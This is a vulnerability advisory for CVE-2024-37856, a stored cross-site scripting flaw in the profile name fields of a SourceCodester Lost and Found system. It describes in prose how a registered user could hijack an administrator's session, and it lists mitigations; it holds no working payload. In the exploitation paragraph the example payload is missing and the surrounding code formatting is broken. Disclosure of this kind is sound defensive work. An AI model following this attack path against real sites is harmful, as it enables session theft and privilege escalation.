CVE-2024-37856

Vulnerability

Lost and Found Information System 1.0 (published on SourceCodester) contains a Cross-Site Scripting (XSS) vulnerability in the User Profile page [1]. The first, last, and middle name fields do not sanitize user-supplied input, allowing an attacker to inject arbitrary JavaScript. The vulnerability is stored in the database and executed whenever an administrator views the affected profile. No authentication is required to trigger the stored payload on the admin side, but the attacker must first have a valid account to edit their profile.

Exploitation

An attacker with a registered user account navigates to the User Profile page and injects malicious JavaScript payloads (e.g., `) into one or more of the first, last, or middle name` fields. After saving the profile, the payload is stored in the application's backend. When an administrator visits the User Profile management section (e.g., viewing user details), the injected script executes in the admin's browser context. The attacker requires only network access to the web application and a valid session token for their own account.

Impact

Successful exploitation leads to arbitrary JavaScript execution within the administrator's session. This can be used to steal session cookies, perform actions on behalf of the admin (e.g., modifying system settings, creating new admin accounts), or exfiltrate sensitive data. The net result is privilege escalation from a standard user to full administrative control over the Lost and Found Information System [1].

Mitigation

As of the publication date (2024-07-29), no official patch has been released by the vendor (SourceCodester). The developer recommends sanitizing all user inputs by escaping HTML entities (e.g., using htmlspecialchars in PHP) and implementing Content Security Policy (CSP) headers to mitigate script execution. Until a fixed version is provided, administrators should manually review and sanitize stored profile data and restrict user registration to trusted parties [1].